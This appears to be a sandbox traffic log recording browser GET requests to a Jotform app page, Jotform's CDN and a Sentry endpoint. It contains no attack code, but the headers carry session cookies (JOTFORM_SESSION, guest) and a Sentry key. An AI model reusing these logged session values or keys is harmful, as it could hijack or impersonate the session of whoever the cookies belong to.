Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /app/250092704521347/manifest.json HTTP/1.1Host: eu.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /app/250092704521347/manifest.json HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54If-Modified-Since: Fri, 10 Jan 2025 12:35:59 GMT
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726 HTTP/1.1Host: eu-files.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=144&height=144&time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /assets/img/favicons/favicon-2021-light.png HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144 HTTP/1.1Host: eu-files.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /assets/img/favicons/favicon-2021-light.png HTTP/1.1Host: cdn.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32 HTTP/1.1Host: eu-files.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /app/250092704521347 HTTP/1.1Host: eu.jotform.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347If-Modified-Since: Fri, 10 Jan 2025 12:35:55 GMT
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=358478-358478If-Range: "d458b68730a7330653700489333a7837"
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=358478-369018If-Range: "d458b68730a7330653700489333a7837"
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/6354.b5c7ba01.chunk.css HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/PublicAppContainer.0eeb5429.chunk.css HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/7988.f937c1ff.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/8508.337c9fc2.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/3186.c12c9a19.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /server/check-olark-chat-support?from=app-builder HTTP/1.1Host: eu.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/2224.7e35d425.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/7988.f937c1ff.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/6158.c797260a.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/6354.52cd18d8.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/PublicAppContainer.038a736a.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/3186.c12c9a19.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/8508.337c9fc2.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/2224.7e35d425.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/6354.52cd18d8.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/PublicAppContainer.038a736a.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/250092704521347 HTTP/1.1Host: eu.jotform.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347If-Modified-Since: Fri, 10 Jan 2025 12:36:13 GMT
Source: global trafficHTTP traffic detected: GET /app/250092704521347/manifest.json HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347If-Modified-Since: Fri, 10 Jan 2025 12:36:00 GMT
